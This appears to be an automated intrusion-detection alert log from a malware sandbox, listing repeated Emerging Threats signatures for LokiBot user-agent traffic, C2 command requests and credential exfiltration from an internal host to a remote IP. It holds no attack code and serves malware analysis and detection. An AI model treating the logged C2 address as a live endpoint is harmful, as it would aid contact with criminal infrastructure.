ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:16.392996
SID:	2021641
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:35.562440
SID:	2024313
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:58.404316
SID:	2024313
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:07.189244
SID:	2024313
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:15.173099
SID:	2024318
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:50.920365
SID:	2021641
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:13.826993
SID:	2024313
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:47.479485
SID:	2021641
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:57.993136
SID:	2024318
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:07.189244
SID:	2024318
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:36.181912
SID:	2021641
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:15.173099
SID:	2024313
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:07.780738
SID:	2024318
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:13.826993
SID:	2024318
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:43.818013
SID:	2021641
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:09.977319
SID:	2024318
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:12.423265
SID:	2024313
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:09.977319
SID:	2024313
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:12.423265
SID:	2024318
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:11.469231
SID:	2021641
Source Port:	49807
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:05.989811
SID:	2021641
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:56.719260
SID:	2024318
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:49.906919
SID:	2021641
Source Port:	49835
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:41.014214
SID:	2024313
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:31.634111
SID:	2024313
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:27.987761
SID:	2021641
Source Port:	49820
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:31.634111
SID:	2024318
Source Port:	49823
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:59.746040
SID:	2021641
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:25.250536
SID:	2024318
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:05.247702
SID:	2021641
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:24.107780
SID:	2021641
Source Port:	49817
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:45.029471
SID:	2024318
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:25.250536
SID:	2024313
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:45.029471
SID:	2024313
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:17.524612
SID:	2021641
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:34.305329
SID:	2021641
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:41.192422
SID:	2021641
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:18.909479
SID:	2024318
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:01.045653
SID:	2021641
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:48.461124
SID:	2021641
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:32.329146
SID:	2024318
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:18.909479
SID:	2024313
Source Port:	49813
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:32.329146
SID:	2024313
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:25.348509
SID:	2024313
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:54.719782
SID:	2024313
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:54.719782
SID:	2024318
Source Port:	49794
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:57.336379
SID:	2024312
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:57.200454
SID:	2024313
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:25.348509
SID:	2024318
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:57.336379
SID:	2024317
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:21.643851
SID:	2021641
Source Port:	49815
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:17.642261
SID:	2021641
Source Port:	49812
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:34.955343
SID:	2021641
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:57.200454
SID:	2024318
Source Port:	49796
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:15.058675
SID:	2024318
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:18.729353
SID:	2024318
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:06.504867
SID:	2024313
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:06.504867
SID:	2024318
Source Port:	49803
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:31.102796
SID:	2021641
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:02.240601
SID:	2024313
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:08.999268
SID:	2024313
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:15.058675
SID:	2024313
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:12.681066
SID:	2024313
Source Port:	49808
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:18.729353
SID:	2024313
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:38.643235
SID:	2021641
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:02.240601
SID:	2024318
Source Port:	49800
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:41:59.827008
SID:	2021641
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:16.392996
SID:	2024313
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:29.915605
SID:	2024318
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:50.920365
SID:	2024318
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:45.849788
SID:	2021641
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:08.999268
SID:	2024318
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:21.173515
SID:	2024313
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:16.392996
SID:	2024318
Source Port:	49811
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:21.173515
SID:	2024318
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:29.915605
SID:	2024313
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:56.719260
SID:	2024313
Source Port:	49838
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:13.935226
SID:	2021641
Source Port:	49809
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:28.624649
SID:	2021641
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:47.479485
SID:	2024318
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:07.780738
SID:	2021641
Source Port:	49804
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:50.920365
SID:	2024313
Source Port:	49791
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:47.479485
SID:	2024313
Source Port:	49833
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:15.173099
SID:	2021641
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:05.989811
SID:	2024318
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:16.290446
SID:	2024313
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:03.512691
SID:	2021641
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:09.977319
SID:	2021641
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:28.624649
SID:	2024313
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:02.263836
SID:	2021641
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:12.423265
SID:	2021641
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:28.624649
SID:	2024318
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:05.989811
SID:	2024313
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:16.290446
SID:	2024318
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:23.788777
SID:	2021641
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:26.739380
SID:	2021641
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:46.244048
SID:	2021641
Source Port:	49832
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:59.746040
SID:	2024318
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:49.681959
SID:	2024318
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:41.014214
SID:	2021641
Source Port:	49828
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:59.746040
SID:	2024313
Source Port:	49798
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:49.681959
SID:	2024313
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:33.541899
SID:	2021641
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:04.713098
SID:	2024313
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:25.250536
SID:	2021641
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:34.305329
SID:	2024318
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:05.247702
SID:	2024313
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:04.713098
SID:	2024318
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:41.192422
SID:	2024318
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:42:41.192422
SID:	2024313
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:34.305329
SID:	2024313
Source Port:	49825
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:45.029471
SID:	2021641
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.4 - Destination IP: 45.77.223.48

Timestamp:	04/25/24-09:43:05.247702
SID:	2024318
